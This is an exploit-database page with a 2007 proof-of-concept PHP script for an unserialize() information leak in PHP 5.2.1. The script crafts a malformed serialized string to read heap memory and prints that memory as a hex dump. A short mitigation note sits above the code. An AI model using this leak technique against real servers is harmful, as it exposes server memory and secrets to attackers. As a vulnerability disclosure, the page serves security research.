header-logo
Suggest Exploit
vendor:
PHP
by:
Stefan Esser
7.5
CVSS
HIGH
Information Leak
200
CWE
Product Name: PHP
Affected Version From: PHP 5.2.1
Affected Version To: PHP 5.2.1
Patch Exists: NO
Related CWE:
CPE: a:php:php:5.2.1
Metasploit:
Other Scripts:
Platforms Tested:
2007

PHP 5.2.1 unserialize() Information Leak Vulnerability

This is a proof of concept code for the PHP 5.2.1 unserialize() information leak vulnerability. It allows remote attackers to leak sensitive information from the server.

Mitigation:

Apply the latest patches and updates for PHP to prevent this vulnerability. Sanitize input data to prevent potential exploitation.
Source

Exploit-DB raw data:

<?php
  ////////////////////////////////////////////////////////////////////////
  //  _  _                _                     _       ___  _  _  ___  //
  // | || | __ _  _ _  __| | ___  _ _   ___  __| | ___ | _ \| || || _ \ //
  // | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___||  _/| __ ||  _/ //
  // |_||_|\__,_||_|  \__,_|\___||_||_|\___|\__,_|     |_|  |_||_||_|   //
  //                                                                    //
  //         Proof of concept code from the Hardened-PHP Project        //
  //                   (C) Copyright 2007 Stefan Esser                  //
  //                                                                    //
  ////////////////////////////////////////////////////////////////////////
  //       PHP 5.2.1 unserialize() Information Leak Vulnerability       //
  ////////////////////////////////////////////////////////////////////////

  // This is meant as a protection against remote file inclusion.
  die("REMOVE THIS LINE");
  
  
  
  
  $str = 'S:'.(100*3).':"'.str_repeat('\61', 100).'"';
  $arr = array(str_repeat('"', 200)."1"=>1,str_repeat('"', 200)."2"=>1);

  $heapdump = unserialize($str);
  
  
  
  
  echo "Heapdump\n---------\n\n";
  
  $len = strlen($heapdump);
  for ($b=0; $b<$len; $b+=16) {
    printf("%08x: ", $b);
    for ($i=0; $i<16; $i++) {
      if ($b+$i<$len) {
          printf ("%02x ", ord($heapdump[$b+$i]));
      } else {
          printf (".. ");
      }
    }
    for ($i=0; $i<16; $i++) {
      if ($b+$i<$len) {
          $c = ord($heapdump[$b+$i]);
      } else {
          $c = 0;
      }
      if ($c > 127 || $c < 32) {
        $c = ord(".");
      }
      printf ("%c", $c);
    }
    printf("\n");
  }
?>

# milw0rm.com [2007-03-23]

Navigation

Suggest Exploit

Services By CQR